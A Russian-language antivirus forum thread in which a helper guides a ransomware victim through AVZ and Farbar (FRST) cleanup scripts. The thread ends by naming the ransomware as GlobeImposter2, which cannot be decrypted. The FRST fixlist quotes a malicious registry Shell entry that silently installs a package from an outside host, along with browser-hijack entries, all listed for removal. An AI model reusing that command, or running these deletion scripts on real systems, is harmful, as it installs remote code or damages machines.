Betadm Опубликовано 23 июня, 2017 Share Опубликовано 23 июня, 2017 Есть возможность расшифровать файлы? CollectionLog-2017.06.23-11.57.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 23 июня, 2017 Share Опубликовано 23 июня, 2017 Выполните скрипт в AVZ begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad:$DATA',''); QuarantineFile('C:\Program Files\firefox\bin\firefoxupdate.exe',''); QuarantineFile('C:\Users\user\AppData\Local\Hostinstaller\2866227017_installcube.exe',''); QuarantineFile('C:\ProgramData\InstallChecker\InstallChecker.exe',''); QuarantineFile('C:\Program Files\Phulershoqos\perris.exe',''); QuarantineFile('C:\Users\user\AppData\Local\terana\terana.dll',''); QuarantineFile('C:\Users\user\AppData\Local\CWASRE\Snare.dll',''); QuarantineFile('C:\Users\user\AppData\Roaming\WinSAPSvc\WinSAP.dll',''); QuarantineFile('C:\ProgramData\Microsoft\AppV\setup\install.dll',''); QuarantineFile('C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp',''); QuarantineFile('C:\Users\user\AppData\Local\glory\glory.dll',''); QuarantineFile('C:\Users\user\AppData\Local\CSHMDR\Snare.dll',''); QuarantineFile('C:\ProgramData\BIT\BIT.dll',''); DeleteService('iSafeNetFilter'); DeleteService('iSafeKrnlR3'); DeleteService('iSafeKrnlMon'); DeleteService('iSafeKrnlKit'); DeleteService('iSafeKrnl'); DeleteFile('C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys','32'); DeleteFile('iSafeKrnlR3.sys','32'); DeleteFile('C:\Windows\system32\Drivers\iSafeNetFilter.sys','32'); DeleteFile('iSafeKrnl.sys','32'); DeleteFile('iSafeKrnlKit.sys','32'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','background_fault'); DeleteFile('C:\Users\user\AppData\Local\background_fault\bf.dll','32'); DeleteFile('C:\Users\user\AppData\Local\background_fault\aswRD.exe','32'); DeleteFile('C:\Program Files\Obnovi Soft\ObnoviSoft.exe','32'); DeleteFile('C:\ProgramData\BIT\BIT.dll','32'); DeleteFile('C:\Users\user\AppData\Local\CSHMDR\Snare.dll','32'); DeleteFile('C:\Users\user\AppData\Local\glory\glory.dll','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\glory\Parameters','ServiceDll'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\CSHMDR\Parameters','ServiceDll'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\BIT\Parameters','ServiceDll'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Обнови Софт','command'); DeleteFile('C:\Users\user\AppData\Roaming\WinSAPSvc\WinSAP.dll','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\WinSAPSvc\Parameters','ServiceDll'); DeleteFile('C:\Users\user\AppData\Local\CWASRE\Snare.dll','32'); DeleteFile('C:\Users\user\AppData\Local\terana\terana.dll','32'); DeleteFile('C:\Program Files\Phulershoqos\perris.exe','32'); DeleteFile('C:\Windows\system32\Tasks\Clerfather Controls','32'); DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\DeviceSettings\Phulerge','32'); DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\Apps\UpService','32'); DeleteFile('C:\ProgramData\InstallChecker\InstallChecker.exe','32'); DeleteFile('C:\Windows\system32\Tasks\Milimili','32'); DeleteFile('C:\Windows\system32\Tasks\Soft installer','32'); DeleteFile('C:\Users\user\AppData\Local\Hostinstaller\2866227017_installcube.exe','32'); DeleteFile('C:\Program Files\firefox\bin\firefoxupdate.exe','32'); DeleteFile('C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad:$DATA','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; ExecuteREpair(9); RebootWindows(false); end.Будет выполнена перезагрузка компьютера. Выполните скрипт в AVZ begin CreateQurantineArchive('c:\quarantine.zip'); end. c:\quarantine.zip отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger Ссылка на комментарий Поделиться на другие сайты More sharing options...
Betadm Опубликовано 26 июня, 2017 Автор Share Опубликовано 26 июня, 2017 сделал по инструкции, отправил касперскому Сообщение от модератора Mark D. Pearlstone quarantine.zip прикреплять не нужно. Файл удалён. CollectionLog-2017.06.26-14.07.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 26 июня, 2017 Share Опубликовано 26 июня, 2017 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files. 3. Нажмите кнопку Scan. 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Betadm Опубликовано 4 июля, 2017 Автор Share Опубликовано 4 июля, 2017 Farbar farbar.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 4 июля, 2017 Share Опубликовано 4 июля, 2017 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: HKU\S-1-5-21-4088658036-1457375118-661796478-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1QRWzSRkZYNWF3NTRXMjLXNYU3MTZXNYFxFjk4NdzYRq== /q <==== ATTENTION HKLM\...\Providers\li3jn956: C:\Program Files\Clerfather Controls\local32spl.dll [281088 2017-05-12] () <==== ATTENTION ShellExecuteHooks: No Name - {1D4A956C-3176-11E7-B331-64006A5CFC23} - -> No File GroupPolicy: Restriction - Chrome <==== ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495012992&z=0ec248e2cf88311469d3629gcz9tbweeeg3o5tet3g&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495012992&z=0ec248e2cf88311469d3629gcz9tbweeeg3o5tet3g&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX&q={searchTerms} HKU\S-1-5-21-4088658036-1457375118-661796478-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYyiOHCaLamHvAWetw2G1r_Go3rZkI-dBW6Peiv2HbQwW6qYvm2EWtrNJ7UDNmFwvSudMTwfCwvER_KA4MkWZYA7dX3bjmgsfMyItgsB91ipuTmpKsJ3cCS7W6_pRFA5tHFqj2xdlY6jLkUZnwRgzl4o4AoXw78rgNTwIVHgzs,&q={searchTerms} HKU\S-1-5-21-4088658036-1457375118-661796478-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX HKU\S-1-5-21-4088658036-1457375118-661796478-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX SearchScopes: HKLM -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYyiOHCaLamHvAWetw2G1r_Go3rZkI-dBW6Peiv2HbQwW6qYvm2EWtrNJ7UDNmFwvSudMTwfCwvER_KA4MkWZYA7dX3bjmgsfMyItgsB91ipuTmpKsJ3cCS7W6_pRFA5tHFqj2xdlY6jLkUZnwRgzl4o4AoXw78rgNTwIVHgzs,&q={searchTerms} SearchScopes: HKU\S-1-5-21-4088658036-1457375118-661796478-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX&q={searchTerms} SearchScopes: HKU\S-1-5-21-4088658036-1457375118-661796478-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495786317&z=fe22c3db1819ea848500853g1z9t9w1meb1qcccg4z&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX&q={searchTerms} SearchScopes: HKU\S-1-5-21-4088658036-1457375118-661796478-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYyiOHCaLamHvAWetw2G1r_Go3rZkI-dBW6Peiv2HbQwW6qYvm2EWtrNJ7UDNmFwvSudMTwfCwvER_KA4MkWZYA7dX3bjmgsfMyItgsB91ipuTmpKsJ3cCS7W6_pRFA5tHFqj2xdlY6jLkUZnwRgzl4o4AoXw78rgNTwIVHgzs,&q={searchTerms} FF ProfilePath: C:\Users\user\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\opd4fif0.default\Profiles\opd4fif0.default [not found] <==== ATTENTION FF Extension: (supermegabest) - C:\Users\user\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\jid1-n5ARdBzHkUEdAA@jetpack.xpi [2016-03-23] FF Extension: (Fast search v 0.25) - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\opd4fif0.default\Extensions\{d720d64d-c71a-4316-b59e-8a41b860178f} [2016-07-19] [not signed] FF SearchPlugin: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\opd4fif0.default\searchplugins\li3jn956.xml [2017-05-12] FF SearchPlugin: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\opd4fif0.default\searchplugins\ourluckysites.xml [2017-05-17] CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1495012992&z=0ec248e2cf88311469d3629gcz9tbweeeg3o5tet3g&from=che0812&uid=TOSHIBAXDT01ACA050_94FU561BSXX94FU561BSX" CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.mystarting123.com/search/index.php?z=a665e3e3f458b30feeabc6bg8z4t4w6q9geo1weo1oe&q={searchTerms} CHR DefaultSearchKeyword: ChromeDefaultData -> mystarting123 CHR HKLM\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [gbjeiekahklbgbfccohipinhgaadijad] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [necfmkplpminfjagblfabggomdpaakan] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [pfigaoamnncijbgomifamkmkidnnlikl] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-4088658036-1457375118-661796478-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx S2 WinSAPSvc; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) S2 BIT; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) S2 CSHMDR; C:\Windows\System32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) S2 glory; C:\Windows\System32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [104448 2017-05-15] (TODO: <Company name>) [File not signed] <==== ATTENTION <==== ATTENTION 2017-06-22 10:15 - 2017-06-22 10:15 - 00008959 _____ C:\Users\user\AppData\Roaming\Paxynok.html 2017-06-22 10:11 - 2017-06-22 10:11 - 00008959 _____ C:\Users\user\Documents\Paxynok.html 2017-06-22 10:04 - 2017-06-22 10:04 - 00008959 _____ C:\Users\Все пользователи\Paxynok.html 2017-06-22 10:04 - 2017-06-22 10:04 - 00008959 _____ C:\Users\user\Paxynok.html 2017-05-15 12:04 - 2017-06-26 12:00 - 00000000 ____D C:\Users\Все пользователи\BIT 2017-05-15 12:04 - 2017-06-26 12:00 - 00000000 ____D C:\Users\user\AppData\Roaming\WinSAPSvc 2017-05-15 12:04 - 2017-06-26 12:00 - 00000000 ____D C:\ProgramData\BIT 2017-05-15 12:04 - 2017-06-26 11:59 - 00000000 ____D C:\Users\user\AppData\Local\CWASRE 2017-05-15 12:04 - 2017-05-15 12:04 - 00000000 ____D C:\Program Files\MIO 2017-05-15 12:02 - 2017-05-31 12:06 - 00000000 ____D C:\Program Files\li3jn956 2017-05-12 13:29 - 2017-06-02 08:01 - 00000000 ____D C:\Program Files\Phulershoqos 2017-05-12 13:29 - 2017-05-18 08:36 - 00000000 ____D C:\Users\user\AppData\Roaming\Sadogeclozedom 2017-05-12 13:29 - 2017-05-17 12:06 - 00000000 ____D C:\Users\user\AppData\Local\Terwopy 2017-05-12 13:29 - 2017-05-12 13:29 - 00000000 ____D C:\Program Files\Clerfather Controls FirewallRules: [{9CECD728-9367-4C43-8779-A4CC4C9F9640}] => (Allow) C:\Users\user\AppData\Local\Amigo\Application\amigo.exe Task: {23FDD96A-3E26-4C73-8CFB-EA7C68282E6B} - \Microsoft\Windows\DeviceSettings\Phulerge -> No File <==== ATTENTION Task: {5FB4C907-389A-485D-9ED2-56BECB57AF7C} - \Milimili -> No File <==== ATTENTION Task: {CA0A4D3D-354D-49D2-8103-876D0A8F385D} - \Microsoft\Windows\Apps\UpService -> No File <==== ATTENTION Task: {EA2D259D-A03E-448D-8AE0-FD9048AA1E80} - \Soft installer -> No File <==== ATTENTION Task: {F4E408BB-3761-4A6F-8196-94843DBF6403} - \Clerfather Controls -> No File <==== ATTENTION Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание, что будет выполнена перезагрузка компьютера. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Betadm Опубликовано 5 июля, 2017 Автор Share Опубликовано 5 июля, 2017 fixlog Fixlog.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 5 июля, 2017 Share Опубликовано 5 июля, 2017 Мусор почистили. С расшифровкой помочь не сможем. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Betadm Опубликовано 5 июля, 2017 Автор Share Опубликовано 5 июля, 2017 спс, но вопрос в расшифровке, там и так виндовс будет переставлена Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 5 июля, 2017 Share Опубликовано 5 июля, 2017 Увы, это GlobeImposter2, для которого расшифровка есть только у злодеев Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти